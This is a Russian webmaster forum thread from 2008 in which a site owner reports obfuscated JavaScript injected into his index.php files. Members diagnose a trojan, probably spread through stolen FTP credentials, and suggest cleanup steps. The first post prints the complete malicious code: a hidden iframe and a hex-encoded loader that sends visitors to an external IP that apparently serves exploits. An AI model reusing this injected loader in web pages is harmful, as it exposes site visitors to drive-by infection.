Хакерский модуль
На страницу 1, 2  След.
Новая тема Написать ответ
# Пн Янв 28, 2008 8:25 pmm_Stasuk Зарег.: 23.12.2007 ; Сообщ.: 5967Ответить с цитатой
Привет!

У меня такая история, взял хостинг к которому можно прикрутить 5 доменов.

4 сайта не вордпресе, один сайт на движке, который писал один знакомый.

Короче обнаружил на всех сайтах вот такую запись

Код:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v479c9fa343af2(v479c9fa343efc){ function v479c9fa3442e5 () {return 16;} return(parseInt(v479c9fa343efc,v479c9fa3442e5()));}function v479c9fa344af0(v479c9fa344eea){ function v479c9fa345b0a () {return 2;} var v479c9fa3452fe='';for(v479c9fa3456f8=0; v479c9fa3456f8<v479c9fa344eea.length; v479c9fa3456f8+=v479c9fa345b0a()){ v479c9fa3452fe+=(String.fromCharCode(v479c9fa343af2(v479c9fa344eea.substr(v479c9fa3456f8, v479c9fa345b0a()))));}return v479c9fa3452fe;} document.write(v479c9fa344af0('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3037663863207372633D
5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3531383837292B27653437626563313466625C27207769647
4683D353833206865696768743D3839207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>



Эта запись стоит в исходном коде в самом низу. Кто подскажет что это и как бороться.
Написал в сапорт хостинга, там сказали типа разбирайтесь сами.

пример сайта _photoles.ru могу все написать, но думаю ни к чему.
# Пн Янв 28, 2008 8:28 pmm_Stasuk Зарег.: 23.12.2007 ; Сообщ.: 5967Ответить с цитатой
да и еще, как я понял это модуль, который перенаправляет моих посетителей, точнее не перенаправляет, а накручивает моих посетителей на счетчик других сайтов. Можно как-то понять каких? Я так понимаю что какой-то сеошник кидает какого-то рекламодателе через меня. Хотел бы короче узнать кто это и :rr6: r5 bums этого чувака. Если конечно он в пределах досягаемости.
# Пн Янв 28, 2008 9:46 pmm_Stasuk Зарег.: 23.12.2007 ; Сообщ.: 5967Ответить с цитатой
реально эту дуру видит только каспер. Если у кого-то каспер, то посмотрите плиз как называется вирус
# Пн Янв 28, 2008 11:02 pmm_Stasuk Зарег.: 23.12.2007 ; Сообщ.: 5967Ответить с цитатой
В кратце:
заражает файл index.php, расположенный в корневой директории сайта, путём дописывания в его конец вредоносного? javascript кода....
Делает это предположительно в автоматическом режиме...

такой троян гремел год назад у agava.ru

заражает файлы index.php
# Пн Янв 28, 2008 11:03 pmm_Stasuk Зарег.: 23.12.2007 ; Сообщ.: 5967Ответить с цитатой
сам с собой поговорил Laughing
# Вт Янв 29, 2008 2:08 amЖека Зарег.: 07.12.2005 ; Сообщ.: 2173Ответить с цитатой
1) чистить свой комп, вполне вероятно, что доступ к сайту был получен трояном через ваш комп
2) после чистки домашнего компа менять пароли от хостинга (обязательно от фтп, желательно от http панели), либо поменять пароли с другого компа
3) удалить эту хрень на индексных страницах

ps менять пароли без чистки своего компа бесмысленно - появится опять.
# Вт Янв 29, 2008 7:09 amLi-Hua Зарег.: 25.12.2005 ; Сообщ.: 11544Ответить с цитатой
m_Stasuk, у тебя от фтп пассы увели и ифрейм поставляли или ты сателлиты купил готовые такие? я не понял из первого поста
# Вт Янв 29, 2008 9:34 amm_Stasuk Зарег.: 23.12.2007 ; Сообщ.: 5967Ответить с цитатой
я не знаю как получилось. Все 5 сайтов делал я сам. Похоже что меня ломанули все же.
# Вт Янв 29, 2008 10:27 amLi-Hua Зарег.: 25.12.2005 ; Сообщ.: 11544Ответить с цитатой
Ну тогда тебя или хостинг ломанули, меняй пассы, апдейти ВП, проверь свой комп.
# Ср Фев 06, 2008 12:25 amagrasoff Зарег.: 08.12.2007 ; Сообщ.: 106Ответить с цитатой
Жека писал(а):
1) чистить свой комп, вполне вероятно, что доступ к сайту был получен трояном через ваш комп
2) после чистки домашнего компа менять пароли от хостинга (обязательно от фтп, желательно от http панели), либо поменять пароли с другого компа
3) удалить эту хрень на индексных страницах

ps менять пароли без чистки своего компа бесмысленно - появится опять.

да, самое частое - это ftp-аккаунты у тебя берут, которые локально на твоем компе хранятся.. и все действия, которые жека перечислил очень ценные :)

а чем ты пользуешься для работы с ftp? интересно просто. вот в total commander'e пароли в открытом виде хранятся. поэтому их очень
легко оттуда взять и попользовать.
# Вс Май 04, 2008 10:57 pmm_Stasuk Зарег.: 23.12.2007 ; Сообщ.: 5967Ответить с цитатой
короче этот модуль отравлял мне жизнь все это время. r5

сейчас нашли решение. Файлу index.php поставили атрибуты 444. Это скорее всего должно искоренить проблему.
# Вс Май 04, 2008 11:07 pmDmitr Зарег.: 23.04.2007 ; Сообщ.: 926Ответить с цитатой
только там ничего не накручивается, там на сплойты на сплойты всё ...

а если уж антивирь ворчит, то слова мои подтверждает. по сути Жека отписал элементарно что сделать.
# Пн Май 05, 2008 9:32 pmdensa Зарег.: 27.06.2006 ; Сообщ.: 1018Ответить с цитатой
скорее всего у тебя пароли от фтп увели. Если так то хоть какие права поставь, переписать его всеравно можно будет. Работай над защитой своего компа
# Вт Май 06, 2008 8:57 pmm_Stasuk Зарег.: 23.12.2007 ; Сообщ.: 5967Ответить с цитатой
то что Жека написал я делал 500 000 миллионов раз. Не помогло.
Чищу комп, меняю пароли, но через время модуль появляется опять.

Сейчас пока затишье.
# Пт Май 16, 2008 4:58 pmIseeDeadPeople Зарег.: 06.12.2005 ; Сообщ.: 21730Ответить с цитатой
а.. лала.. пам пам.. тум тум..
а бывает в наших краях... лам лам пам пам...
когда даже платный хостер.. ла ла пам пам

.......... на всем своем .. машинке ... ла ла пам пам СТАВИТ НА НЕКОТОРОЕ ВРЕМЯ .. ла ла пам пам ТИПА ИФР#ЙМ какого нить троя как АДДОН РЕВРИТЕР НА ВЕСЬ ВЫВОД ХТМЛ контента с машинке..
пали что за хостер Smile
Новая тема Написать ответ    ГЛАВНАЯ ~ АНТИЧИТ
 На страницу 1, 2  След.
Любое использование материалов, размещенных на ArmadaBoard.com, без разрешения владельцев ArmadaBoard.com запрещено.